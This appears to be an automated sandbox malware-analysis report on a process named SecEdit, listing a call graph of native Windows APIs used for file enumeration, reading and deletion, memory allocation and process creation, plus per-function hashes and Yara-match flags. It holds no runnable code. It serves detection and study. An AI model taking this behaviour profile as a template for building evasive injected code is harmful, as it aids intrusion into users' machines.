80784->80785 80786 58bd53 FindFirstFileW 80784->80786 80786->80785 80788 58bd6e 80786->80788 80787 58bd94 FindNextFileW 80787->80788 80789 58bda6 FindClose 80787->80789 80788->80787 80789->80785 80790 585500 80791 587940 LdrInitializeThunk 80790->80791 80792 585530 80790->80792 80791->80792 80794 58555c 80792->80794 80795 5878c0 80792->80795 80796 587904 80795->80796 80801 587925 80796->80801 80802 5971d0 80796->80802 80798 587915 80799 587931 80798->80799 80800 597e60 NtClose 80798->80800 80799->80792 80800->80801 80801->80792 80803 5971f4 80802->80803 80804 597242 80802->80804 80803->80798 80807 3014650 LdrInitializeThunk 80804->80807 80805 597267 80805->80798 80807->80805 80370 590c40 80371 590c5c 80370->80371 80372 590c98 80371->80372 80373 590c84 80371->80373 80380 597e60 80372->80380 80374 597e60 NtClose 80373->80374 80376 590c8d 80374->80376 80377 590ca1 80383 599e50 RtlAllocateHeap 80377->80383 80379 590cac 80381 597e7a 80380->80381 80382 597e8b NtClose 80381->80382 80382->80377 80383->80379 80384 597dc0 80385 597e2c 80384->80385 80386 597de4 80384->80386 80387 597e42 NtDeleteFile 80385->80387 80388 5824fa 80391 585d70 80388->80391 80390 582533 80392 585da3 80391->80392 80393 585dc3 80392->80393 80398 5979d0 80392->80398 80393->80390 80395 597e60 NtClose 80397 585e66 80395->80397 80396 585de6 80396->80393 80396->80395 80397->80390 80399 5979ed 80398->80399 80402 3012ca0 LdrInitializeThunk 80399->80402 80400 597a19 80400->80396 80402->80400 80403 579870 80405 5798c6 80403->80405 80406 57a0bb 80405->80406 80407 5999d0 80405->80407 80408 5999f6 80407->80408 80413 5740e0 80408->80413 80410 599a02 80411 599a30 80410->80411 80416 594460 80410->80416 80411->80406 80420 582fa0 80413->80420 80415 5740ed 80415->80410 80417 5944ba 80416->80417 80419 5944c7 80417->80419 80431 581440 80417->80431 80419->80411 80421 582fb3 80420->80421 80423 582fcc 80421->80423 80424 5988b0 80421->80424 80423->80415 80425 5988c8 80424->80425 80426 5988ec 80425->80426 80427 5974c0 LdrInitializeThunk 80425->80427 80426->80423 80428 59893d 80427->80428 80429 599d30 RtlFreeHeap 80428->80429 80430 598952 80429->80430 80430->80423 80432 581441 80431->80432 80447 5876d0 80432->80447 80434 581483 80435 58174f 80434->80435 80436 599e10 RtlAllocateHeap 80434->80436 80435->80419 80437 581499 80436->80437 80438 599e10 RtlAllocateHeap 80437->80438 80439 5814aa 80438->80439 80440 599e10 RtlAllocateHeap 80439->80440 80442 5814bb 80440->80442 80446 58154e 80442->80446 80458 5864d0 80442->80458 80443 584270 LdrLoadDll 80444 58170f 80443->80444 80481 596b80 80444->80481 80446->80443 80448 5876fc 80447->80448 80485 5875c0 80448->80485 80451 587729 80453 587734 80451->80453 80455 597e60 NtClose 80451->80455 80452 587741 80454 58775d 80452->80454 80456 597e60 NtClose 80452->80456 80453->80434 80454->80434 80455->80453 80457 587753 80456->80457 80457->80434 80459 5864f5 80458->80459 80460 586529 80459->80460 80461 585d70 2 API calls 80459->80461 80462 586646 80460->80462 80496 586000 80460->80496 80461->80460 80462->80446 80464 5865bf 80465 5865ca 80464->80465 80511 585e80 80464->80511 80465->80446 80468 586732 80470 586000 3 API calls 80468->80470 80469 597e60 NtClose 80475 586692 80469->80475 80471 586748 80470->80471 80474 58674f 80471->80474 80515 5861d0 80471->80515 80473 58678c 80473->80446 80474->80446 80476 585e80 LdrInitializeThunk 80475->80476 80477 5866dd 80476->80477 80478 597e60 NtClose 80477->80478 80479 5866e7 80478->80479 80480 585e80 LdrInitializeThunk 80479->80480 80480->80468 80482 596bda 80481->80482 80484 596be7 80482->80484 80560 581760 80482->80560 80484->80435 80486 5875da 80485->80486 80490 5876b6 80485->80490 80491 597560 80486->80491 80489 597e60 NtClose 80489->80490 80490->80451 80490->80452 80492 59757a 80491->80492 80495 30135c0 LdrInitializeThunk 80492->80495 80493 5876aa 80493->80489 80495->80493 80497 58602c 80496->80497 80498 585e80 LdrInitializeThunk 80497->80498 80499 586076 80498->80499 80503 586118 80499->80503 80541 597930 80499->80541 80501 58610f 80502 597e60 NtClose 80501->80502 80502->80503 80503->80464 80504 58609d 80504->80501 80505 586124 80504->80505 80506 597930 LdrInitializeThunk 80504->80506 80507 597e60 NtClose 80505->80507 80506->80504 80508 58612d 80507->80508 80509 585e80 LdrInitializeThunk 80508->80509 80510 58614a 80508->80510 80509->80510 80510->80464 80512 585ea5 80511->80512 80546 5977d0 80512->80546 80516 5861f5 80515->80516 80517 585d70 2 API calls 80516->80517 80518 586225 80516->80518 80517->80518 80519 585e80 LdrInitializeThunk 80518->80519 80527 586428 80518->80527 80529 5864c1 80518->80529 80521 586351 80519->80521 80520 585e80 LdrInitializeThunk 80522 586476 80520->80522 80523 58635c 80521->80523 80521->80527 80551 585f30 80522->80551 80525 597e60 NtClose 80523->80525 80530 586366 80525->80530 80526 597e60 NtClose 80526->80529 80527->80520 80528 586486 80528->80526 80529->80473 80531 585e80 LdrInitializeThunk 80530->80531 80532 5863b1 80531->80532 80533 597e60 NtClose 80532->80533 80534 5863bb 80533->80534 80535 585e80 LdrInitializeThunk 80534->80535 80536 586406 80535->80536 80537 585f30 LdrInitializeThunk 80536->80537 80538 586416 80537->80538 80539 597e60 NtClose 80538->80539 80540 586420 80539->80540 80540->80473 80542 59794a 80541->80542 80545 3012ba0 LdrInitializeThunk 80542->80545 80543 59797a 80543->80504 80545->80543 80547 5977ea 80546->80547 80550 3012c60 LdrInitializeThunk 80547->80550 80548 585f19 80548->80468 80548->80469 80550->80548 80552 585f56 80551->80552 80555 597830 80552->80555 80556 59784a 80555->80556 80559 3013090 LdrInitializeThunk 80556->80559 80557 585fe4 80557->80528 80559->80557 80562 581780 80560->80562 80576 5879a0 80560->80576 80570 581c68 80562->80570 80583 590600 80562->80583 80565 581981 80567 59af40 2 API calls 80565->80567 80566 5817de 80566->80570 80586 59ae10 80566->80586 80571 581996 80567->80571 80568 5819c1 80569 587940 LdrInitializeThunk 80568->80569 80568->80570 80573 580400 LdrInitializeThunk 80568->80573 80569->80568 80570->80484 80571->80568 80591 580400 80571->80591 80573->80568 80574 581aef 80574->80568 80575 587940 LdrInitializeThunk 80574->80575 80575->80574 80577 5879ad 80576->80577 80578 5879ce SetErrorMode 80577->80578 80579 5879d4 80577->80579 80578->80579 80579->80562 80581 587a38 80579->80581 80582 599d30 RtlFreeHeap 80579->80582 80594 587820 CreateProcessInternalW LdrInitializeThunk LdrInitializeThunk 80579->80594 80581->80562 80582->80579 80584 599cb0 NtAllocateVirtualMemory 80583->80584 80585 590621 80583->80585 80584->80585 80585->80566 80587 59ae20 80586->80587 80588 59ae26 80586->80588 80587->80565 80589 599e10 RtlAllocateHeap 80588->80589 80590 59ae4c 80589->80590 80590->80565 80592 58041e 80591->80592 80595 5980d0 80591->80595 80592->80574 80594->80579 80596 5980ea 80595->80596 80599 3012c70 LdrInitializeThunk 80596->80599 80597 598112 80597->80592 80599->80597 80600 586bf0 80601 586c0c 80600->80601 80604 586c5f 80600->80604 80603 597e60 NtClose 80601->80603 80601->80604 80602 586d88 80605 586c27 80603->80605 80604->80602 80606 586000 3 API calls 80604->80606 80608 586000 3 API calls 80605->80608 80607 586d62 80606->80607 80607->80602 80609 5861d0 4 API calls 80607->80609 80608->80604 80609->80602 80610 597470 80611 59748a 80610->80611 80614 3012df0 LdrInitializeThunk 80611->80614 80612 5974b2 80614->80612 80620 59ae70 80621 599d30 RtlFreeHeap 80620->80621 80622 59ae85 80621->80622 80623 597b70 80624 597c1c 80623->80624 80626 597b98 80623->80626 80625 597c32 NtCreateFile 80624->80625 80627 587ff1 80628 587fe2 80627->80628 80629 587ff6 80627->80629 80629->80628 80631 586a40 LdrInitializeThunk LdrInitializeThunk 80629->80631 80631->80628 80632 58a4e0 80637 58a210 80632->80637 80634 58a4ed 80651 589eb0 80634->80651 80636 58a509 80638 58a235 80637->80638 80662 587b90 80638->80662 80641 58a372 80641->80634 80643 58a389 80643->80634 80644 58a380 80644->80643 80648 58a471 80644->80648 80677 589910 80644->80677 80647 58a4c9 80649 599d30 RtlFreeHeap 80647->80649 80648->80647 80686 589c70 80648->80686 80650 58a4d0 80649->80650 80650->80634 80652 589ec6 80651->80652 80660 589ed1 80651->80660 80653 599e10 RtlAllocateHeap 80652->80653 80653->80660 80654 589ee7 80654->80636 80655 587b90 GetFileAttributesW 80655->80660 80656 58a1de 80657 58a1f7 80656->80657 80658 599d30 RtlFreeHeap 80656->80658 80657->80636 80658->80657 80659 589910 RtlFreeHeap 80659->80660 80660->80654 80660->80655 80660->80656 80660->80659 80661 589c70 RtlFreeHeap 80660->80661 80661->80660 80663 587bb1 80662->80663 80664 587bb8 GetFileAttributesW 80663->80664 80665 587bc3 80663->80665 80664->80665 80665->80641 80666 5922a0 80665->80666 80667 5922ae 80666->80667 80668 5922b5 80666->80668 80667->80644 80669 584270 LdrLoadDll 80668->80669 80670 5922ea 80669->80670 80671 5922f9 80670->80671 80690 591d70 LdrLoadDll 80670->80690 80673 599e10 RtlAllocateHeap 80671->80673 80676 592494 80671->80676 80675 592312 80673->80675 80674 599d30 RtlFreeHeap 80674->80676 80675->80674 80675->80676 80676->80644 80678 589936 80677->80678 80691 58d150 80678->80691 80680 58999d 80682 589b20 80680->80682 80684 5899bb 80680->80684 80681 589b05 80681->80644 80682->80681 80683 5897d0 RtlFreeHeap 80682->80683 80683->80682 80684->80681 80696 5897d0 80684->80696 80687 589c96 80686->80687 80688 58d150 RtlFreeHeap 80687->80688 80689 589d12 80688->80689 80689->80648 80690->80671 80693 58d166 80691->80693 80692 58d173 80692->80680 80693->80692 80694 599d30 RtlFreeHeap 80693->80694 80695 58d1ac 80694->80695 80695->80680 80697 5897e6 80696->80697 80700 58d1c0 80697->80700 80699 5898ec 80699->80684 80701 58d1e4 80700->80701 80702 58d27c 80701->80702 80703 599d30 RtlFreeHeap 80701->80703 80702->80699 80703->80702 80704 58ed60 80705 58edc4 80704->80705 80706 585d70 2 API calls 80705->80706 80708 58eeed 80706->80708 80707 58eef4 80708->80707 80709 585e80 LdrInitializeThunk 80708->80709 80710 58ef70 80709->80710 80711 58f093 80710->80711 80712 595bb0 RtlFreeHeap 80710->80712 80713 58ef8d 80712->80713 80714 58f0a2 80713->80714 80735 58eb40 80713->80735 80715 597e60 NtClose 80714->80715 80717 58f0ac 80715->80717 80718 58efa5 80718->80714 80719 58efb0 80718->80719 80720 599e10 RtlAllocateHeap 80719->80720 80721 58efd9 80720->80721 80722 58eff8 80721->80722 80723 58efe2 80721->80723 80744 58ea30 CoInitialize 80722->80744 80724 597e60 NtClose 80723->80724 80726 58efec 80724->80726 80727 58f006 80728 597930 LdrInitializeThunk 80727->80728 80733 58f024 80728->80733 80729 58f082 80730 597e60 NtClose 80729->80730 80731 58f08c 80730->80731 80732 599d30 RtlFreeHeap 80731->80732 80732->80711 80733->80729 80734 597930 LdrInitializeThunk 80733->80734 80734->80733 80736 58eb5c 80735->80736 80737 584270 LdrLoadDll 80736->80737 80739 58eb7a 80737->80739 80738 58eb83 80738->80718 80739->80738 80740 584270 LdrLoadDll 80739->80740 80741 58ec4e 80740->80741 80742 584270 LdrLoadDll 80741->80742 80743 58ecab 80741->80743 80742->80743 80743->80718 80746 58ea95 80744->80746 80745 58eb2b CoUninitialize 80745->80727 80746->80745 80821 586820 80822 58684a 80821->80822 80825 587770 80822->80825 80824 586870 80826 58778d 80825->80826 80832 5975b0 80826->80832 80828 5877dd 80829 5877e4 80828->80829 80830 597690 LdrInitializeThunk 80828->80830 80829->80824 80831 58780d 80830->80831 80831->80824 80833 597643 80832->80833 80835 5975d7 80832->80835 80837 3012f30 LdrInitializeThunk 80833->80837 80834 59767c 80834->80828 80835->80828 80837->80834 80838 589420 80840 589427 80838->80840 80839 589448 80840->80838 80840->80839 80841 599d30 RtlFreeHeap 80840->80841 80841->80839 80842 594e20 80843 594e7a 80842->80843 80845 594e87 80843->80845 80846 5929a0 80843->80846 80847 599cb0 NtAllocateVirtualMemory 80846->80847 80848 5929e1 80847->80848 80849 584270 LdrLoadDll 80848->80849 80852 592ae6 80848->80852 80851 592a27 80849->80851 80850 592a60 Sleep 80850->80851 80851->80850 80851->80852 80852->80845

                                                            Executed Functions

                                                            Function 0058BC80 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0058BD64
                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0058BD9F
                                                            • FindClose.KERNELBASE(?), ref: 0058BDAA
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 671a163cd6cc6b72c0805cde6b562972d3c602ec384ff662d5b02908a5cad152
                                                            • Instruction ID: ed1892a6aa53b298b306af0962c4f2c4e81e63aeba5ef107a70c5a7d9fcad620
                                                            • Opcode Fuzzy Hash: 671a163cd6cc6b72c0805cde6b562972d3c602ec384ff662d5b02908a5cad152
                                                            • Instruction Fuzzy Hash: 043185B16007497BEB60EB64CC89FEF7B7CEF84744F144458B908A7181DB71AA848BA4
                                                            Function 02DFCC94 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 175nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792488834.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2df0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: MemoryReadVirtual
                                                            • String ID: Xo)
                                                            • API String ID: 2834387570-431647615
                                                            • Opcode ID: be9f294a03c1c198172525ee50bb0d357ea71fedc6d95d6f313a903f28f11b64
                                                            • Instruction ID: 10c5abb8ed19a88b5695388a7810dc9b1f0d29aeeb4917fc083368fc6a75871d
                                                            • Opcode Fuzzy Hash: be9f294a03c1c198172525ee50bb0d357ea71fedc6d95d6f313a903f28f11b64
                                                            • Instruction Fuzzy Hash: EC51F33751428D4FC712CF7894552DABFA1EB427287A4479FC6D28B3A6C3114813D7D8
                                                            Function 00597B70 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00597C63
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 92ef33578ea23af972abc873a34a61d42a2a83145ad60282d5ba439591b58ce9
                                                            • Instruction ID: 9ca626b2cd15f589eaa9336562c2e8e4ef2a143666eca89e4a0731aba091d524
                                                            • Opcode Fuzzy Hash: 92ef33578ea23af972abc873a34a61d42a2a83145ad60282d5ba439591b58ce9
                                                            • Instruction Fuzzy Hash: 3A31A7B5A11609AFCB14DF99D885EDFB7F9BF8C314F108219F918A3240D770A911CBA5
                                                            Function 00597CD0 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00597DAB
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 68dfbbb4a08441dab3b8eec8ecae1e870b0c481ef36d17217bc50f78a852324c
                                                            • Instruction ID: 93beaba88dac1656d699cb46124bfdf2d530c85791f8ec9d9cbfcc960313345d
                                                            • Opcode Fuzzy Hash: 68dfbbb4a08441dab3b8eec8ecae1e870b0c481ef36d17217bc50f78a852324c
                                                            • Instruction Fuzzy Hash: F331D7B5A00609AFCB14DF59D885EEFB7B9EF8C314F108209F918A7240D770A911CBA5
                                                            Function 00597FB0 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(005817DE,?,?,00000000,00000004,00003000,?,?,?,?,?,?,005817DE,?,00590621,?), ref: 0059806D
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: 67c0c5d1f46d2c296b83bf2eac31f1da16e54ecb1cdd1814f46c9d8746362209
                                                            • Instruction ID: 015d9e1c4aa93d22dc6ed7a16933202ebb5b5ea59e1362d8e49cd71c0f9ca079
                                                            • Opcode Fuzzy Hash: 67c0c5d1f46d2c296b83bf2eac31f1da16e54ecb1cdd1814f46c9d8746362209
                                                            • Instruction Fuzzy Hash: D32117B5A01609ABDB14DF68DC45EABB7A9EF89314F00810AF918A7280D770A811CBA5
                                                            Function 00597DC0 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: da283a3833e2ac03665296ccba12cf12f768adfe4f4f10f9b86e9e2bc1e17b65
                                                            • Instruction ID: 28b1bb10ee1c721e87499c035ac5969f3dbef620500cea40f1b69d962d34ecb9
                                                            • Opcode Fuzzy Hash: da283a3833e2ac03665296ccba12cf12f768adfe4f4f10f9b86e9e2bc1e17b65
                                                            • Instruction Fuzzy Hash: 7201AD726116087FDB20EA68EC4AFAB77ADEFC5314F00814AFA1897181DBB07910C7E5
                                                            Function 00597E60 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00597E94
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: a095f2cc110330fb65e3db0d0815f16563e75411f895d3cd10f7a49718a19118
                                                            • Instruction ID: d28eca334ce0c7490684c6eebf33ec79aa58b03be83688edff9ca130de26ddfc
                                                            • Opcode Fuzzy Hash: a095f2cc110330fb65e3db0d0815f16563e75411f895d3cd10f7a49718a19118
                                                            • Instruction Fuzzy Hash: 85E08C362002047BCA20EA69DC45FDF7B6DEFC6764F008015FA0CA7242CAB1B90187F4
                                                            Function 03014340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1cac1dd8a093f6c8620378d7b479240bd56b7a875d327bcd02d8373091cbf663
                                                            • Instruction ID: b0bc45c475209bb80179f2e525c4ff6c7900dba3b15eba01b9549ac20d37209b
                                                            • Opcode Fuzzy Hash: 1cac1dd8a093f6c8620378d7b479240bd56b7a875d327bcd02d8373091cbf663
                                                            • Instruction Fuzzy Hash: 1F90023560681412A140B1588885546444597E0301B56C012E0424554C8F148A565361
                                                            Function 03013090 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 6df5301fb96dd2c857a07ae5f2b89b18c26b912f342771c66a1381bc0b65e153
                                                            • Instruction ID: 66b4011c45073a67baf204b65308f192e4857e5cdd01ca23de7a5d6ddb15f7b2
                                                            • Opcode Fuzzy Hash: 6df5301fb96dd2c857a07ae5f2b89b18c26b912f342771c66a1381bc0b65e153
                                                            • Instruction Fuzzy Hash: 5F90022524241C02E140B158C4157070446C7D0601F56C012A0024554D8B168A6567B1
                                                            Function 03014650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: f4428e112fd45fdf637b8cbb387a778a0c03fb74a99542f02ad3c6f6f80cb1c0
                                                            • Instruction ID: 6b931265410d8dbabc0688631be3f06c1cc0bf116fc6d877de19b2dadb8c15fe
                                                            • Opcode Fuzzy Hash: f4428e112fd45fdf637b8cbb387a778a0c03fb74a99542f02ad3c6f6f80cb1c0
                                                            • Instruction Fuzzy Hash: 6F900265602514425140B1588805406644597E1301396C116A0554560C8B1889559369
                                                            Function 030135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 49cbe0991a5376de7ce1b3eab084db98c8edf5426d17b93a14b122fb49f575b4
                                                            • Instruction ID: 076f0a4a11df75ca0f4d477af31348e5b6ff1bf54b921dde1e66c5b1302deb4a
                                                            • Opcode Fuzzy Hash: 49cbe0991a5376de7ce1b3eab084db98c8edf5426d17b93a14b122fb49f575b4
                                                            • Instruction Fuzzy Hash: BD90023560651802E100B1588515706144587D0201F66C412A0424568D8B958A5166A2
                                                            Function 03012B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: d1bf321b21c93857407dec1b9523e1c241a51c8c0e3284aa362105b09f603272
                                                            • Instruction ID: 4c43af6a9ef6e19cfa5a0cf6ce68960489fec1709e2b2b8891301e167da3d711
                                                            • Opcode Fuzzy Hash: d1bf321b21c93857407dec1b9523e1c241a51c8c0e3284aa362105b09f603272
                                                            • Instruction Fuzzy Hash: FD900265203414035105B1588415616444A87E0201B56C022E1014590DCA2589916225
                                                            Function 03012BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 94c8bcce6afcf74119d68a7a66c9649528e50dd1f2c36a66e68f6254d0fc8215
                                                            • Instruction ID: 9ccce081879dbf0fa395f32013408c58ba4b5e9e020c778777095a50b2f6145a
                                                            • Opcode Fuzzy Hash: 94c8bcce6afcf74119d68a7a66c9649528e50dd1f2c36a66e68f6254d0fc8215
                                                            • Instruction Fuzzy Hash: BD90023560641C02E150B1588415746044587D0301F56C012A0024654D8B558B5577A1
                                                            Function 03012BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 237bc40b6acd3db41e55b0d38e25ef24f0809f0802a98176457db290909f8f06
                                                            • Instruction ID: 505076fcfaeaeaa57dfca8a095dcfd8469f201051c3ba8c1fd4cf398c24d7664
                                                            • Opcode Fuzzy Hash: 237bc40b6acd3db41e55b0d38e25ef24f0809f0802a98176457db290909f8f06
                                                            • Instruction Fuzzy Hash: 5090023520645C42E140B1588405A46045587D0305F56C012A0064694D9B258E55B761
                                                            Function 03012BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
